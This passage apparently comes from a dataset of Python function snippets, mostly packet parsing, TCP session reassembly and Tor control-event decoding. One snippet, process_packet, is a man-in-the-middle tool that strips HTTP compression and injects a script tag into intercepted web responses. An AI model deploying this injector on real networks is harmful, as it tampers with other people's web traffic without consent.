pd.DataFrame(tmp)\n logging.info(\"Ended list conversion\")\n return X", "def handle_ip_header(pkt, packets, index):\r\n ver = pkt[28]\r\n ihl = pkt[29]\r\n type_of_service = pkt[30:32]\r\n total_length = int(pkt[32:36], 16)\r\n identification = int(pkt[36:40], 16)\r\n flags = pkt[40:44]\r\n ttl = int(pkt[44:46], 16)\r\n protocol = int(pkt[46:48], 16)\r\n header_checksum = pkt[48:52]\r\n src_ip = pkt[52:60]\r\n dest_ip = pkt[60:68]\r\n str_src = str(int(src_ip[0:2], 16))\r\n for i in range(2, len(src_ip), 2):\r\n str_src += \".\" + str(int(src_ip[i:i+2], 16))\r\n str_dest = str(int(dest_ip[0:2], 16))\r\n for i in range(2, len(dest_ip), 2):\r\n str_dest += \".\" + str(int(dest_ip[i:i+2], 16))\r\n next_start_point = 2 * (ethe_header_len + int(ihl) * 4)\r\n options = pkt[68:2*(ethe_header_len + int(ihl)*4)]\r\n\r\n # store it to specific location for each packet\r\n packets[index][1].append(ver)\r\n packets[index][1].append(ihl)\r\n packets[index][1].append(type_of_service)\r\n packets[index][1].append(total_length)\r\n packets[index][1].append(identification)\r\n packets[index][1].append(flags)\r\n packets[index][1].append(ttl)\r\n packets[index][1].append(protocol)\r\n packets[index][1].append(header_checksum)\r\n packets[index][1].append(str_src)\r\n packets[index][1].append(str_dest)\r\n packets[index][1].append(options)\r\n\r\n return packets, next_start_point", "def process_packet(packet):\n scapy_packet = scapy.IP(packet.get_payload())\n print(\"[+] Processing Packet...\")\n if scapy_packet.haslayer(scapy.Raw):\n load = scapy_packet[scapy.Raw].load\n if scapy_packet[scapy.TCP].dport == 80:\n print(\"[+] Request !!!!!\")\n if \"Accept-Encoding:\" in load:\n load = re.sub(\"Accept-Encoding:.*?\\\\r\\\\n\",\"\",load)\n elif scapy_packet[scapy.TCP].sport == 80:\n print(\"[+] Response !!!!!\")\n injection_code = \"<script>alert('Shubhi');</script>\"\n load = scapy_packet[scapy.Raw].load.replace(\"</body>\",injection_code+\"</body>\")\n content_length_search = re.search(\"(?:Content-Length:\\s)(\\d*)\",load)\n if content_length_search:\n content_length = content_length_search.group(1)\n new_content_length = int(content_length)+len(injection_code)\n load = load.replace(content_length,str(new_content_length))\n if load!=scapy_packet[scapy.Raw].load:\n scapy_packet = set_load(scapy_packet, load)\n packet.set_payload(str(scapy_packet))\n scapy_packet.show()\n packet.accept()", "def _decode1(self, body, data):\r\n if \" \" in body:\r\n evtype,body = body.split(\" \",1)\r\n else:\r\n evtype,body = body,\"\"\r\n evtype = evtype.upper()\r\n if evtype == \"CIRC\":\r\n m = re.match(r\"(\\d+)\\s+(\\S+)(\\s\\S+)?(\\s\\S+)?(\\s\\S+)?(\\s\\S+)?\", body)\r\n if not m:\r\n raise ProtocolError(\"CIRC event misformatted.\")\r\n ident,status,path,purpose,reason,remote = m.groups()\r\n ident = int(ident)\r\n if path:\r\n if \"PURPOSE=\" in path:\r\n remote = reason\r\n reason = purpose\r\n purpose=path\r\n path=[]\r\n elif \"REASON=\" in path:\r\n remote = reason\r\n reason = path\r\n purpose = \"\"\r\n path=[]\r\n else:\r\n path_verb = path.strip().split(\",\")\r\n path = []\r\n for p in path_verb:\r\n path.append(p.replace(\"~\", \"=\").split(\"=\")[0])\r\n else:\r\n path = []\r\n\r\n if purpose and \"REASON=\" in purpose:\r\n remote=reason\r\n reason=purpose\r\n purpose=\"\"\r\n\r\n if purpose: purpose = purpose[9:]\r\n if reason: reason = reason[8:]\r\n if remote: remote = remote[15:]\r\n event = CircuitEvent(evtype, ident, status, path, purpose, reason,\r\n remote, body)\r\n elif evtype == \"STREAM\":\r\n #plog(\"DEBUG\", \"STREAM: \"+body)\r\n m = re.match(r\"(\\S+)\\s+(\\S+)\\s+(\\S+)\\s+(\\S+)?:(\\d+)(\\sREASON=\\S+)?(\\sREMOTE_REASON=\\S+)?(\\sSOURCE=\\S+)?(\\sSOURCE_ADDR=\\S+)?(\\s+PURPOSE=\\S+)?\", body)\r\n if not m:\r\n raise ProtocolError(\"STREAM event misformatted.\")\r\n ident,status,circ,target_host,target_port,reason,remote,source,source_addr,purpose = m.groups()\r\n ident,circ = map(int, (ident,circ))\r\n if not target_host: # This can happen on SOCKS_PROTOCOL failures\r\n target_host = \"(none)\"\r\n if reason: reason = reason[8:]\r\n if remote: remote = remote[15:]\r\n if source: source = source[8:]\r\n if source_addr: source_addr = source_addr[13:]\r\n if purpose:\r\n purpose = purpose.lstrip()\r\n purpose = purpose[8:]\r\n event = StreamEvent(evtype, ident, status, circ, target_host,\r\n int(target_port), reason, remote, source, source_addr,\r\n purpose, body)\r\n elif evtype == \"ORCONN\":\r\n m = re.match(r\"(\\S+)\\s+(\\S+)(\\sAGE=\\S+)?(\\sREAD=\\S+)?(\\sWRITTEN=\\S+)?(\\sREASON=\\S+)?(\\sNCIRCS=\\S+)?\", body)\r\n if not m:\r\n raise ProtocolError(\"ORCONN event misformatted.\")\r\n target, status, age, read, wrote, reason, ncircs = m.groups()\r\n\r\n #plog(\"DEBUG\", \"ORCONN: \"+body)\r\n if ncircs: ncircs = int(ncircs[8:])\r\n else: ncircs = 0\r\n if reason: reason = reason[8:]\r\n if age: age = int(age[5:])\r\n else: age = 0\r\n if read: read = int(read[6:])\r\n else: read = 0\r\n if wrote: wrote = int(wrote[9:])\r\n else: wrote = 0\r\n event = ORConnEvent(evtype, status, target, age, read, wrote,\r\n reason, ncircs, body)\r\n elif evtype == \"STREAM_BW\":\r\n m = re.match(r\"(\\d+)\\s+(\\d+)\\s+(\\d+)\", body)\r\n if not m:\r\n raise ProtocolError(\"STREAM_BW event misformatted.\")\r\n event = StreamBwEvent(evtype, body, *m.groups())\r\n elif evtype == \"BW\":\r\n m = re.match(r\"(\\d+)\\s+(\\d+)\", body)\r\n if not m:\r\n raise ProtocolError(\"BANDWIDTH event misformatted.\")\r\n read, written = map(long, m.groups())\r\n event = BWEvent(evtype, read, written, body)\r\n elif evtype in (\"DEBUG\", \"INFO\", \"NOTICE\", \"WARN\", \"ERR\"):\r\n event = LogEvent(evtype, body)\r\n elif evtype == \"NEWDESC\":\r\n ids_verb = body.split(\" \")\r\n ids = []\r\n for i in ids_verb:\r\n ids.append(i.replace(\"~\", \"=\").split(\"=\")[0].replace(\"$\",\"\"))\r\n event = NewDescEvent(evtype, ids, body)\r\n elif evtype == \"ADDRMAP\":\r\n # TODO: Also parse errors and GMTExpiry\r\n m = re.match(r'(\\S+)\\s+(\\S+)\\s+(\\\"[^\"]+\\\"|\\w+)', body)\r\n if not m:\r\n raise ProtocolError(\"ADDRMAP event misformatted.\")\r\n fromaddr, toaddr, when = m.groups()\r\n if when.upper() == \"NEVER\": \r\n when = None\r\n else:\r\n when = time.strptime(when[1:-1], \"%Y-%m-%d %H:%M:%S\")\r\n event = AddrMapEvent(evtype, fromaddr, toaddr, when, body)\r\n elif evtype == \"NS\":\r\n event = NetworkStatusEvent(evtype, parse_ns_body(data), data)\r\n elif evtype == \"NEWCONSENSUS\":\r\n event = NewConsensusEvent(evtype, parse_ns_body(data), data)\r\n elif evtype == \"BUILDTIMEOUT_SET\":\r\n m = re.match(\r\n r\"(\\S+)\\sTOTAL_TIMES=(\\d+)\\sTIMEOUT_MS=(\\d+)\\sXM=(\\d+)\\sALPHA=(\\S+)\\sCUTOFF_QUANTILE=(\\S+)\",\r\n body)\r\n set_type, total_times, timeout_ms, xm, alpha, quantile = m.groups()\r\n event = BuildTimeoutSetEvent(evtype, set_type, int(total_times),\r\n int(timeout_ms), int(xm), float(alpha),\r\n float(quantile), body)\r\n elif evtype == \"GUARD\":\r\n m = re.match(r\"(\\S+)\\s(\\S+)\\s(\\S+)\", body)\r\n entry, guard, status = m.groups()\r\n event = GuardEvent(evtype, entry, guard, status, body)\r\n elif evtype == \"TORCTL_TIMER\":\r\n event = TimerEvent(evtype, data)\r\n else:\r\n event = UnknownEvent(evtype, body)\r\n\r\n return event", "def parse_data(self, data):\n\t\tname, value = self.parse_from_dref(data)\n\t\tpacket = TrollPacket.from_name(name, value)\n\t\tself.update_listeners(packet)", "def udp_pkt_cap(port=None, cnt=125):\n if not port:\n udp_port = 2368\n else:\n udp_port = port\n\n # type: udp socket\n udpSocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\t\n # Enable the SO_REUSEADDR option\n udpSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n new_state = udpSocket.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)\n # print(\"New sock state: %s\" % new_state)\n\n # bind socket\n try:\n udpSocket.bind((\"\", udp_port))\n udpSocket.settimeout(0.06)\n except socket.error as err_msg:\n print(\"Udp socket message:%s\" % err_msg)\n return\n\n udp_buf = 1304\n pkt_cnt = cnt\n messages = []\n while True:\n dat, add = udpSocket.recvfrom(udp_buf)\n if (dat[0:2] == b'\\xaa\\xaa') or (dat[0:2] == b'\\xbb\\xbb') or (dat[0:2] == b'\\xcc\\xcc'):\n # print(add[0], add[1], hex(ord(dat[2])) + '{:02x}'.format(ord(dat[3])) )\n # print(add[0], add[1], '0x{:02X} 0x{:02X}'.format(dat[2], dat[3]))\n print(\"Recv ok source ip and port is \", add)\n messages.append(dat + b'\\n')\n if pkt_cnt > 1:\n for _ in range(pkt_cnt - 1):\n datfrm, add = udpSocket.recvfrom(udp_buf)\n messages.append(datfrm + b'\\n')\n break\n else:\n break\n\n return messages # return string", "def decode(self, eth):\n\t\tif eth.type == dpkt.ethernet.ETH_TYPE_ARP:\n\t\t\t# print 'arp'\n\t\t\treturn ARP(eth.data).get()\n\n\t\telif eth.type == dpkt.ethernet.ETH_TYPE_IP6:\n\t\t\tip = eth.data\n\t\t\tif ip.p == dpkt.ip.IP_PROTO_UDP:\n\t\t\t\tudp = ip.data\n\n\t\t\t\t# multicast is just like IPv4\n\t\t\t\tif udp.dport == 5353:\n\t\t\t\t\t# print udp\n\t\t\t\t\tans = mDNS(udp).get()\n\t\t\t\t\t# print 25*'='\n\t\t\t\t\t# pp.pprint(ans)\n\t\t\t\t\t# print 25*'='\n\t\t\t\t\treturn ans\n\n\t\t\t\t# print 'IPv6 UDP','port:',udp.dport,'src:',self.getip(ip.src,True),'dst:',self.getip(ip.dst,True)\n\n\t\t\t# TCP not useful\n\t\t\telif ip.p == dpkt.ip.IP_PROTO_TCP:\n\t\t\t\tpass\n\t\t\t\t# tcp = ip.data\n\t\t\t\t# print 'IPv6 TCP','port:',tcp.dport,'src:',self.getip(ip.src,True),'dst:',self.getip(ip.dst,True)\n\n\t\t\t# ICMP error msg not useful for mapping\n\t\t\telif ip.p == dpkt.ip.IP_PROTO_ICMP6:\n\t\t\t\t# print 'IPv6 icmp6:',ip.data.data\n\t\t\t\tpass\n\n\t\t\t# other stuff I haven't decoded\n\t\t\telse:\n\t\t\t\tpass\n\t\t\t\t# print 'IPv6',ip.p,'src:',self.getip(ip.src,True),'dst:',self.getip(ip.dst,True)\n\t\telif eth.type == dpkt.ethernet.ETH_TYPE_IP:\n\t\t\tip = eth.data\n\n\t\t\t# roku interface port: 1900 dst: 239.255.255.250 1900\n\t\t\tif ip.p == dpkt.ip.IP_PROTO_UDP:\n\t\t\t\tudp = ip.data\n\n\t\t\t\t# these aren't useful\n\t\t\t\tif udp.dport == 53: # DNS\n\t\t\t\t\t# return DNS(udp.data)\n\t\t\t\t\treturn {}\n\n\t\t\t\telif udp.dport == 5353: # mDNS\n\t\t\t\t\t# print 'mDNS'\n\t\t\t\t\t# print udp\n\t\t\t\t\treturn mDNS(udp).get()\n\n\t\t\t\telif self.getip(ip.dst) == '239.255.255.250':\n\t\t\t\t\treturn {}\n\n\t\t\t\telse:\n\t\t\t\t\t# don't print standard ports\n\t\t\t\t\t# 17500 dropbox\n\t\t\t\t\t# if not ip.data.dport in [17500]:\n\t\t\t\t\t# \tprint 'other udp','port:',udp.dport,'src:',self.getip(ip.src),'dst:',self.getip(ip.dst),': '\n\t\t\t\t\treturn {}\n\t\t\telif ip.p == dpkt.ip.IP_PROTO_TCP:\n\t\t\t\t# src = self.getip(ip.src)\n\t\t\t\t# if netaddr.IPAddress(src) not in netaddr.IPNetwork(\"192.168.1.0/24\"):\n\t\t\t\t# \twho = ''\n\t\t\t\t# \tif src not in self.ipMap:\n\t\t\t\t# \t\twho = WhoIs(src).record['NetName']\n\t\t\t\t# \t\tself.ipMap[src] = who\n\t\t\t\t# \telse:\n\t\t\t\t# \t\twho = self.ipMap[src]\n\t\t\t\t# \tif who in ['GOOGLE','AKAMAI','APPLE-WWNET','AMAZO-ZIAD1','DROPBOX']:\n\t\t\t\t# \t\treturn {}\n\t\t\t\t# \telse:\n\t\t\t\t# \t\tprint src,who\n\t\t\t\t# don't print standard ports\n\t\t\t\t# port 58969 - XSANS Apple, why do i see that?\n\t\t\t\t# 22 ssh\n\t\t\t\t# 25 smtp\n\t\t\t\t# 80 http\n\t\t\t\t# 123 time server\n\t\t\t\t# 143 imap\n\t\t\t\t# 443 https\n\t\t\t\t# 445 smb\n\t\t\t\t# 548 afp over tcp\n\t\t\t\t# 5009 airport admin utility\n\t\t\t\t# 5222 ichat\n\t\t\t\t# 17500 dropbox\n\t\t\t\t# if not ip.data.dport in [22,25,80,123,143,443,445,548,5009,5222,17500]:\n\t\t\t\t\t# print 'other tcp','port:',ip.data.dport,'src:',self.getip(ip.src),'dst:',self.getip(ip.dst)\n\t\t\t\treturn {}\n\t\t\t# elif ip.p == dpkt.ip.IP_PROTO_ICMP6:\n\t\t\t# \tprint '?????? other icmp6','src:',self.getip(ip.src),'dst:',self.getip(ip.dst)\n\t\t\telif ip.p == 2:\n\t\t\t\tpass\n\t\t\t\t# print 'IGMP','src:',self.getip(ip.src),'dst:',self.getip(ip.dst)\n\t\t\telse:\n\t\t\t\t# print 'other ip packet','src:',self.getip(ip.src),'dst:',self.getip(ip.dst)\n\t\t\t\treturn {}", "def getBriefPacket(self):\n\n # briefPacket = NamedTuple('Brief Packet',\n # ['no', 'time', 'source', 'destination',\n # 'protocol', 'length'])\n return (self.pktIndex, self.pktTime, self.pktSrc,\n self.pktDst, self.pktProt, self.pktLen, self.pktStack)", "def _do_some_logic(self, packet):\n\n\n pass", "def __recv_frame(self) -> Dict[str, Any]:\n # Grab a packet\n packets = self.sock.recvfrom(Sniffer.RECEIVE_SIZE)\n address = self.__process_address(packets[1])\n packet = packets[0]\n offset = 0\n\n # Make sure its a valid packet\n eth_header = self.__process_ethframe(packet[offset:(offset + Sniffer.ETH_HEADER_LENGTH)])\n offset = offset + eth_header['header_length']\n\n if eth_header['protocol'] != 8:\n # Not IP\n raise UnknownPacketException(\n 'Unknown frame {}'.format(eth_header['protocol'])\n )\n\n # Get the IP header\n ip_header = self.__process_ipframe(packet[offset:(offset + Sniffer.IP_HEADER_LENGTH)])\n offset = offset + ip_header['header_length']\n\n if ip_header['protocol'] != 6:\n # Not TCP\n raise UnknownPacketException(\n 'Unknown protocol {}'.format(ip_header['protocol']),\n )\n\n # Get TCP header\n tcp_header = self.__process_tcpframe(packet[offset:(offset + Sniffer.TCP_HEADER_LENGTH)])\n offset = offset + tcp_header['header_length']\n\n # Get payload length\n payload_length = ip_header['length'] - ip_header['header_length'] - tcp_header['header_length']\n\n # Get payload\n data = packet[offset:offset + payload_length]\n\n return {\n 'ip_header': ip_header,\n 'tcp_header': tcp_header,\n 'data': data,\n 'address': address,\n }", "def __process_tcpframe(self, tcp_header: bytes) -> Dict[str, Any]:\n tcph = struct.unpack('!HHLLBBHHH', tcp_header)\n\n # Normal stuff\n source_port = tcph[0]\n dest_port = tcph[1]\n sequence = tcph[2]\n acknowledgement = tcph[3]\n tcphl = (tcph[4] >> 4) * 4\n\n # TCP flags\n flags = ((tcph[4] & 1) << 8) | tcph[5]\n\n return {\n 'header_length': tcphl,\n 'source_port': source_port,\n 'destination_port': dest_port,\n 'sequence': sequence,\n 'acknowledgement': acknowledgement,\n 'flags': self.__process_flags(flags),\n }", "def _process(self, buf, ts=None, pkt_num=None):\n\n if not buf:\n return\n self.pkt_num = pkt_num\n eth = dpkt.ethernet.Ethernet(buf)\n ip = eth.data\n tcp = ip.data\n sip = inet_to_str(ip.src)\n dip = inet_to_str(ip.dst)\n fin_flag = tcp.flags & 0x001\n ack_flag = tcp.flags & 0x010\n syn_flag = tcp.flags & 0x002\n rst_flag = tcp.flags & 0x004\n syn_unacceptable_states = [TCPState.ESTABLISHED, TCPState.FIN_WAIT_1, TCPState.FIN_WAIT_2,\n TCPState.CLOSING, TCPState.LAST_ACK]\n data_acceptable_states = [TCPState.ESTABLISHED, TCPState.CLOSE_WAIT]\n tcp_opts = dpkt.tcp.parse_opts(tcp.opts) if tcp.opts else None\n tcp_opts = tcp_opts_tuple_list_to_dict(tcp_opts) if tcp_opts else None\n num_pkt_session_pkt = len(self.sessions[self.session_count]) if self.session_count else 0\n\n # Only Window size can change in ACKs (in other words - after SYNs), nothing else like - window-scaling, or\n # MSS, or Selective-SYN can't be changed. If present in options after SYN, should be ignored in my opinion\n # https://superuser.com/questions/966212/does-the-sequence-number-of-tcp-packet-headers-wrap-around\n # TODO: seq number in coming packet is ahead of the expected one, then it should be held for processing\n\n def slide_window():\n\n if len(self.sessions[self.session_count]):\n if sip == self.sip:\n if self._s_mss != -1 and get_tcp_packet_payload_len_with_options(eth) > self._s_mss:\n return\n prev_ip = dpkt.ethernet.Ethernet(self.get_last_c_pkt()).data\n rcv_nxt = self._s_rcv_next\n win_left_end = self._s_win_left_edge\n early_pkts = self._s_early_pkts\n other_end_win_size = self._s_win_size\n current_state = self._c_state\n else:\n if self._c_mss != -1 and get_tcp_packet_payload_len_with_options(ip) > self._c_mss:\n return\n prev_ip = dpkt.ethernet.Ethernet(self.get_last_s_pkt()).data\n rcv_nxt = self._c_rcv_next\n win_left_end = self._c_win_left_edge\n early_pkts = self._c_early_pkts\n other_end_win_size = self._c_win_size\n current_state = self._s_state\n if self._print_debug_info:\n logger.debug(self.client_server_next_rcv(), tcp_pkt_debug_info(ip))\n prev_tcp = prev_ip.data\n prev_tcp_data_offset = prev_tcp.off * 4\n prev_ip_header_len = prev_ip.hl * 4\n prev_tcp_payload_len = prev_ip.len - (prev_tcp_data_offset + prev_ip_header_len)\n tcp_payload_len = get_tcp_packet_payload_len(ip)\n if (tcp_seq_number_in_window(win_left_end, tcp.seq, other_end_win_size) or\n tcp_seq_number_in_window(win_left_end,\n inc_tcp_seq_number(tcp.seq, tcp_payload_len), other_end_win_size)):\n if inc_tcp_seq_number(tcp.seq, tcp_payload_len) == rcv_nxt:\n \"\"\"\n \n Since there is no new payload sent, just store the tcp packet with empty payload.\n This is going to increase the packet count but not going to add duplicated data\n in session data, by session data here it means actual data sent (after discarding\n the retransmission) to application layer. To do that - we will empty out the payload,\n if packets has some, then add the packet to the session, else add the empty packet as it is\n to the session. This logic will easily handle the TCP connections supporting\n TCP Timestamp options describe in https://tools.ietf.org/html/rfc1323\n \n \"\"\"\n # one case is when seq number is < rcv_nxt but sender want to ack more data\n # which means it is sending the same data again but its acking more received content\n \"\"\"\n 1. packet has Data\n a. prev_packet has data\n A. header change (change cur packet and change previous packet) add to list\n B. no header change retransmission ( sum check)\n b. prev_packete has no data\n A. header change (change cur packet only) add to list\n B. no header change retransmission (change cur packet only)\n 2. packet has no data\n a. prev_packet has data\n A. header change (change previous packet only) add to list\n B. no header change (change previous packet only)\n b. prev_packet has no data\n A. header change (sum check) add to list\n B. no header change retransmission (sum check)\n \"\"\"\n if prev_tcp.sum == tcp.sum:\n cur_sum = tcp_shasum_calc(ip.src, ip.dst, ip.p, ip.data.pack())\n prev_sum = tcp_shasum_calc(prev_ip.src, prev_ip.dst, prev_ip.p, prev_ip.data.pack())\n if cur_sum == prev_sum:\n # covers 1.a.B and 2.b.B\n return\n\n empty_prev_ip = copy.deepcopy(prev_ip)\n empty_prev_tcp = empty_prev_ip.data\n empty_prev_tcp.seq = rcv_nxt\n empty_prev_ip.len -= prev_tcp_payload_len\n empty_prev_tcp.data = b\"\"\n empty_prev_ip = tcp_fix_checksum(empty_prev_ip)\n new_part_ip = copy.deepcopy(ip)\n new_part_tcp = new_part_ip.data\n new_part_tcp.data = b\"\"\n new_part_tcp.seq = rcv_nxt\n new_part_ip.len -= tcp_payload_len\n new_part_ip.sum = 0\n new_part_tcp.sum = 0\n new_part_ip = tcp_fix_checksum(new_part_ip)\n eth.data = new_part_ip\n cur_pkt = eth.pack()\n new_pkt = dpkt.ethernet.Ethernet(cur_pkt)\n new_part_ip = new_pkt.data\n new_part_tcp = new_part_ip.data\n\n \"\"\"\n Checksum comparision logic is kept to discard the straight duplicates packets\n without Timestamp Options. These kind of packet will not serve any purposes.\n If removal of these checksum comparison code blocks felt necessary, it could\n be removed -- that will add few extra retransmitted packets -- but that would\n also requrie to update the testcases built around this code blocks.\n \"\"\"\n if new_part_tcp.sum == empty_prev_tcp.sum:\n # covers 1.b.B\n # covers case 2.a.B\n if tcp_shasum_calc(ip.src, ip.dst, ip.p, ip.data.pack()) == tcp_shasum_calc(\n prev_ip.src, prev_ip.dst, prev_ip.p, empty_prev_ip.data.pack()):\n return\n \"\"\"\n needs to added to list under cases 2.a.A, 2.b.A, 1.a.A and 1.b.A\n cur_pkt is updated earlier\n \"\"\"\n if sip == self.sip:\n if inc_tcp_seq_number(self._c_rcv_next, 1) <= new_part_tcp.ack:\n self._c_rcv_next = new_part_tcp.ack\n else:\n if inc_tcp_seq_number(self._s_rcv_next, 1) <= new_part_tcp.ack:\n self._s_rcv_next = new_part_tcp.ack\n elif (current_state in data_acceptable_states and\n tcp_seq_number_in_window(tcp.seq, rcv_nxt, tcp_payload_len)):\n stale_data_len = seq_numbers_diff(tcp.seq, rcv_nxt)\n win_right_end = inc_tcp_seq_number(win_left_end, other_end_win_size)\n if tcp_seq_number_in_window(rcv_nxt, inc_tcp_seq_number(tcp.seq, tcp_payload_len),\n seq_numbers_diff(rcv_nxt, win_right_end)):\n tcp.data = tcp.data[stale_data_len:]\n else:\n allowed_payload_size = seq_numbers_diff(rcv_nxt, win_right_end)\n remaining_eth = dpkt.ethernet.Ethernet(eth.pack())\n #remaining_ip = eth.data\n #remaining_tcp = remaining_ip.data\n remaining_eth.data.data.seq = inc_tcp_seq_number(tcp.seq, stale_data_len + allowed_payload_size)\n remaining_eth.data.data.data = tcp.data[stale_data_len + allowed_payload_size:]\n remaining_eth.data.len -= stale_data_len + allowed_payload_size\n remaining_eth.data = tcp_fix_checksum(remaining_eth.data)\n #remaining_eth.data = remaining_ip\n tcp.data = tcp.data[stale_data_len: stale_data_len + allowed_payload_size]\n if self.sip == sip:\n self._s_early_pkts.append(((ts, self.pkt_num), remaining_eth.pack()))\n else:\n self._c_early_pkts.append(((ts, self.pkt_num), remaining_eth.pack()))\n tcp.sum = 0\n # ip.len -= stale_data_len\n tcp.seq = rcv_nxt\n ip.data = tcp\n ip.sum = 0\n eth.data = ip\n cur_pkt = eth.pack()\n if sip == self.sip:\n self._s_rcv_next = inc_tcp_seq_number(self._s_rcv_next,\n (ip.len - (ip.hl * 4 + tcp.off * 4)))\n else:\n self._c_rcv_next = inc_tcp_seq_number(self._c_rcv_next,\n (ip.len - (ip.hl * 4 + tcp.off * 4)))\n elif (current_state in data_acceptable_states and\n tcp_seq_number_in_window(rcv_nxt, tcp.seq, other_end_win_size)):\n # hold it for further processing\n if self.sip == sip:\n self._s_early_pkts.append(((ts, self.pkt_num), buf))\n else:\n self._c_early_pkts.append(((ts, self.pkt_num), buf))\n return\n else:\n return\n self.sessions[self.session_count].append(((ts, self.pkt_num), cur_pkt))\n # as this packet is accepted, might need to update the rwnd size and left end of rwnd\n if sip == self.sip:\n self._c_payload_size += len(eth.data.data.data)\n logger.debug(\"Client send data size: {}. Accepted data size is: {}.\"\n \" Total data sent from client is: {}\".format(\n len(tcp.data), len(eth.data.data.data), self._c_payload_size))\n self._c_prev_pkt_ind = len(self.sessions[self.session_count]) - 1\n rcv_nxt = self._s_rcv_next\n if (not tcp.ack == self._c_win_left_edge and\n tcp_seq_number_in_window(inc_tcp_seq_number(self._c_win_left_edge, 1),\n tcp.ack, self._c_win_size)):\n self._c_win_left_edge = tcp.ack\n self._c_win_size = tcp.win << self._c_win_scaling_factor\n else:\n self._s_payload_size += len(eth.data.data.data)\n logger.debug(\"Server send data of size: {}. Accepted data size is: {}.\"\n \" Total data sent from server is: {}\".format(\n len(tcp.data), len(eth.data.data.data), self._s_payload_size))\n self._s_prev_pkt_ind = len(self.sessions[self.session_count]) - 1\n rcv_nxt = self._c_rcv_next\n # left edge is incremented by one becuase in_window function checks for inclusive seq number\n # starting at left edge but ACK tells what's the next expected seq number, which could be 1 next\n # to the end of window\n if (not tcp.ack == self._s_win_left_edge and\n tcp_seq_number_in_window(inc_tcp_seq_number(self._s_win_left_edge, 1),\n tcp.ack, self._s_win_size)):\n self._s_win_left_edge = tcp.ack\n self._s_win_size = tcp.win << self._s_win_scaling_factor\n # check if packet at the head of queue is ready to be processed\n while True:\n if len(early_pkts) == 0:\n break\n (_ts, _pkt_num), _buf = early_pkts.popleft()\n early_eth = dpkt.ethernet.Ethernet(_buf)\n early_ip = early_eth.data\n early_tcp = early_ip.data\n if tcp_seq_number_in_window(early_tcp.seq, rcv_nxt, get_tcp_packet_payload_len(early_ip)):\n # if early_tcp.seq <= rcv_nxt:\n self._process(early_eth.pack(), _ts, _pkt_num)\n else:\n early_pkts.appendleft(((_ts, _pkt_num), early_eth.pack()))\n break\n\n \"\"\"\n TCP flags:0x000 (12 bits)\n [11 10 9 8 7 6 5 4 3 2 1 0]\n - Bit 11 10 9: reserved\n - Bit 8: nonce\n - Bit 7: CWR (Congestion window reduced)\n - Bit 6: ECN-Echo (Explicit Congestion Notification)\n - Bit 5: Urgent\n - Bit 4: ACK\n - Bit 3: Push\n - Bit 2: Reset\n - Bit 1: SYN\n - Bit 0: FIN\n \"\"\"\n\n \"\"\"TCP flags for SYN [000000010111]\"\"\"\n\n prev_c_pkt = dpkt.ethernet.Ethernet(self.get_last_c_pkt()) if self.get_last_c_pkt() else None\n prev_c_tcp = prev_c_pkt.data.data if prev_c_pkt else None\n prev_s_pkt = dpkt.ethernet.Ethernet(self.get_last_s_pkt()) if self.get_last_s_pkt() else None\n prev_s_tcp = prev_s_pkt.data.data if prev_s_pkt else None\n logger.debug(tcp_pkt_debug_info(ip))\n logger.debug(tcp_pkt_options_debug_info(tcp))\n logger.debug(\"Processing packet number: {} in the current session\".format(self.pkt_num))\n if rst_flag:\n logger.info(\"Received a RESET flag, packet info: {}\".format(tcp_pkt_debug_info(ip)))\n logger.info(\"TCP state before processing of packet: {}\".format(self.get_printable_state()))\n if self._c_state == TCPState.CLOSED and self._s_state == TCPState.LISTENING:\n self.session_count += 1\n self.sessions[self.session_count] = [((ts, self.pkt_num), buf)]\n self._c_state = self._s_state = TCPState.CLOSED\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n return\n self._c_state = self._s_state = TCPState.CLOSED\n if self.sip == sip:\n self._c_prev_pkt_ind = len(self.sessions[self.session_count])\n else:\n self._s_prev_pkt_ind = len(self.sessions[self.session_count])\n self.sessions[self.session_count].append(((ts, self.pkt_num), buf))\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif syn_flag and (self._c_state in syn_unacceptable_states or self._s_state in syn_unacceptable_states):\n logger.info(\"Received a unacceptable SYN flag, packet info: {}\".format(tcp_pkt_debug_info(ip)))\n logger.info(\"TCP state before processing of packet: {}\".format(self.get_printable_state()))\n self._s_state = self._c_state = TCPState.CLOSED\n self.sessions[self.session_count].append(((ts,self.pkt_num), buf))\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif (self._c_state == TCPState.CLOSED and self._s_state == TCPState.LISTENING and\n self.sip == sip):\n if tcp.flags & 0x017 == 0x002:\n self.session_count += 1\n logger.info(\"number of sessions so far: {}\".format(self.session_count - 1))\n logger.info(\"starting a new session, pkt info: {}\".format(tcp_pkt_debug_info(ip)))\n logger.info(\"TCP state before processing of packet: {}\".format(self.get_printable_state()))\n self.sessions[self.session_count] = []\n self._c_prev_pkt_ind = len(self.sessions[self.session_count])\n self.sessions[self.session_count].append(((ts, self.pkt_num), buf))\n self._c_state = TCPState.SYN_SENT\n self._s_state = TCPState.SYN_RECEIVED\n self._c_seq = tcp.seq\n if tcp_opts:\n if dpkt.tcp.TCP_OPT_WSCALE in tcp_opts:\n self._c_win_scaling_factor = int.from_bytes(tcp_opts[dpkt.tcp.TCP_OPT_WSCALE], \"big\")\n if dpkt.tcp.TCP_OPT_MSS in tcp_opts:\n self._c_mss = int.from_bytes(tcp_opts[dpkt.tcp.TCP_OPT_MSS], \"big\")\n else:\n self._c_win_scaling_factor = 0\n self._c_mss = -1\n self._c_win_size = tcp.win << self._c_win_scaling_factor\n logger.info(\"SYN flag from: {}:{}. Full TCP Flag is: {}\".format(self.sip, self.sp, hex(tcp.flags)))\n logger.info(\"TCP options in the packet: {}\".format(tcp_pkt_options_debug_info(tcp)))\n\n elif self._c_state == TCPState.SYN_SENT and self._s_state == TCPState.SYN_RECEIVED:\n logger.info(\"TCP packet info: {}\".format(tcp_pkt_debug_info(ip)))\n logger.info(\"TCP state before processing of packet: {}\".format(self.get_printable_state()))\n if self.sip == dip:\n exp_ack = inc_tcp_seq_number(prev_c_tcp.seq, 1)\n if not (tcp.flags & 0x017 == 0x012):\n self.sessions[self.session_count].append(((ts, self.pkt_num), buf))\n self._s_state = self._c_state = TCPState.CLOSED\n logger.info(\"SYN-ACK flag is not set in the TCP flags: {} from: {}:{}\".format(hex(tcp.flags),\n self.dip, self.dp))\n return\n if tcp.ack == 